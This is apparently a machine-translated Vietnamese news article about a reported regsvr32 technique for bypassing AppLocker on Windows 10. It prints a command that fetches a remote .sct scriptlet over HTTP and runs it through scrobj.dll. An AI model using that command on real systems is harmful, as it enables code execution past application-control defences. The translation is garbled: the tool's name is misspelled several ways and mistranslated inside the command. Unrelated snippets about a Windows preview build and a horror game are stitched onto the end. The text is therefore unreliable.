Regedom có thể được sử dụng để bỏ qua applocker trên windows 10
Video: Configure Applocker 2024
Một nhà nghiên cứu từ Colorado, người có tên là Casey Smith, đã phát hiện ra rằng Regedom có thể được sử dụng để vượt qua AppLocker trên Windows 10 và đây là một vấn đề lớn đối với người dùng máy tính, đặc biệt là những người trong môi trường kinh doanh.
AppLocker được giới thiệu lần đầu tiên trong Windows 7 và Windows Server 2008 R2. Nó được thiết kế để cho phép quản trị viên chỉ định nhóm hoặc người dùng nào có thể tận dụng một số hoặc tất cả các ứng dụng dựa trên danh tính duy nhất của các tệp. Nếu bạn là người có xu hướng sử dụng AppLocker, thì nên biết rằng nó có thể được sử dụng để tạo các quy tắc nhất định để cho phép các ứng dụng chạy hoặc dừng chúng trong các bản nhạc của chúng.
Đối với những người có thể không biết, Regvr32 có thể được sử dụng để đăng ký và hủy đăng ký DLL. Đây không phải là một công cụ một cú nhấp chuột vì nó là một tiện ích dòng lệnh, vì vậy chỉ những người dùng máy tính tiên tiến mới nên tìm cách tận dụng những gì nó cung cấp.
Chúng tôi hiểu rằng bằng cách sử dụng kỹ thuật này, nó không làm thay đổi sổ đăng ký của hệ thống máy tính, điều này khiến quản trị viên khó biết liệu có bất kỳ thay đổi nào đã được thực hiện hay không.
bộ đệm / s / n / u /i:http://server/file.sct scrobj.dll
Điều đáng kinh ngạc ở đây là các chương trình đã nhận biết được proxy, sử dụng TLS, theo dõi các chuyển hướng, v.v … và And Bạn đoán một nhị phân MS mặc định đã ký. Vì vậy, tất cả những gì bạn cần làm là lưu trữ tệp your.sct tại một địa điểm mà bạn kiểm soát, Smith Smith đã viết.
Kỹ thuật trên không yêu cầu đặc quyền quản trị và nó không làm thay đổi sổ đăng ký. Hơn nữa, các tập lệnh có thể được gọi qua cả HTTP hoặc HTTPS. Hiện tại, Microsoft vẫn chưa phát hành bản vá cho vấn đề nhỏ này, vì vậy, lựa chọn duy nhất tại thời điểm này là chặn Regedom thông qua Windows Firewall.
Thật thú vị, gã khổng lồ phần mềm vẫn chưa phản hồi về vấn đề bảo mật này mà hệ điều hành của nó phải đối mặt. Bây giờ nó đã được mở, chúng tôi hy vọng sẽ nghe được điều gì đó từ công ty cùng với các cuộc đàm phán về một bản vá trong tương lai.
Bây giờ bạn có thể kiểm soát loại ứng dụng nào có thể được cài đặt trên máy tính của bạn
Chúng tôi đang tiến gần đến phiên bản phát hành công khai của Creators Update cho Windows 10. Theo cách đó, Microsoft bắt đầu phát hành các bản dựng Preview mới thường xuyên hơn. Các bản dựng mới không chứa bất kỳ tính năng mới nào, mà thay vào đó, hãy cải thiện những gì đã được trình bày. Bản dựng Windows 10 Preview mới nhất 15046 giới thiệu một tùy chọn cho phép bạn chọn những gì
Các vấn đề về mắt quạ: câu đố không thể hoàn thành, bị mắc kẹt trong quá trình hồi sinh và hơn thế nữa
The Crow's Eye là một game giải đố kinh dị tâm lý mới xuất hiện trên Steam ngày hôm nay. Cho đến nay, chỉ những người thử nghiệm và thành viên báo chí mới có cơ hội dùng thử, và viết những báo cáo và đánh giá đầu tiên về trò chơi này. Theo báo cáo sớm nhất, nhà phát triển của trò chơi, 3D2 Entertainment sẽ có nhiều việc phải làm hơn,
Việc khai thác bỏ qua applocker được sửa với phiên bản windows chính tiếp theo
AppLocker là một tính năng trong HĐH Windows và Máy chủ Windows cho phép quản trị viên kiểm soát những người dùng nào có thể chạy các ứng dụng cụ thể. Công cụ này sử dụng danh tính duy nhất của các tệp và cho phép quản trị viên tạo quy tắc để cho phép hoặc chặn ứng dụng. AppLocker cho phép quản trị viên kiểm soát các loại ứng dụng sau: tệp thực thi (.exe và .com), tập lệnh (.js, .ps1, .vbs, .cmd,
